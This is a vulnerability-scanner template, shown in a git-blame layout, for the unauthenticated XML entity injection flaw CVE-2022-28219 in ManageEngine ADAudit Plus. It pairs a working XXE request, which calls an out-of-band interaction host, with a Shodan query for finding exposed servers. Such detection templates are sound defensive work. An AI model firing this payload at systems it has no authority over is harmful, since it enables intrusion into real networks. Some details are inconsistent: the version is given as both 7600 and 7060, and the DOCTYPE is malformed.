2022-06-30 05:41:59 +00:00
|
|
|
id: CVE-2022-28219
|
|
|
|
|
|
|
|
info:
|
2022-07-04 15:43:26 +00:00
|
|
|
name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution
|
2022-06-30 05:41:59 +00:00
|
|
|
author: dwisiswant0
|
|
|
|
severity: critical
|
|
|
|
description: |
|
2022-07-04 15:43:26 +00:00
|
|
|
Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an
|
2022-07-04 14:33:04 +00:00
|
|
|
unauthenticated XML entity injection attack that can lead to remote code execution.
|
2022-06-30 05:41:59 +00:00
|
|
|
reference:
|
|
|
|
- https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
|
|
|
|
- https://www.horizon3.ai/red-team-blog-cve-2022-28219/
|
2022-06-30 05:53:35 +00:00
|
|
|
- https://manageengine.com
|
2022-07-04 14:33:04 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-28219
|
2023-07-11 19:49:27 +00:00
|
|
|
- http://cewolf.sourceforge.net/new/index.html
|
2022-06-30 05:41:59 +00:00
|
|
|
remediation: |
|
|
|
|
Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
|
|
|
|
is configured with a dedicated service account with restricted privileges.
|
2022-06-30 05:53:35 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2022-28219
|
|
|
|
cwe-id: CWE-611
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.97341
|
2023-04-12 10:55:48 +00:00
|
|
|
cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:*
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-percentile: 0.99825
|
2022-06-30 09:07:30 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2022-06-30 09:07:30 +00:00
|
|
|
shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: zohocorp
|
|
|
|
product: manageengine_adaudit_plus
|
2022-06-30 09:07:30 +00:00
|
|
|
tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth
|
2022-06-30 05:41:59 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-06-30 05:41:59 +00:00
|
|
|
- method: POST
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/api/agent/tabs/agentData"
|
2022-06-30 09:07:30 +00:00
|
|
|
|
2022-06-30 05:41:59 +00:00
|
|
|
body: |
|
|
|
|
[
|
|
|
|
{
|
|
|
|
"DomainName": "{{Host}}",
|
|
|
|
"EventCode": 4688,
|
|
|
|
"EventType": 0,
|
|
|
|
"TimeGenerated": 0,
|
|
|
|
"Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><! foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>"
|
|
|
|
}
|
|
|
|
]
|
|
|
|
|
2023-07-11 19:49:27 +00:00
|
|
|
headers:
|
|
|
|
Content-Type: application/json
|
|
|
|
|
2022-06-30 05:41:59 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
|
|
words:
|
|
|
|
- "http"
|
2022-06-30 09:07:30 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "ManageEngine"
|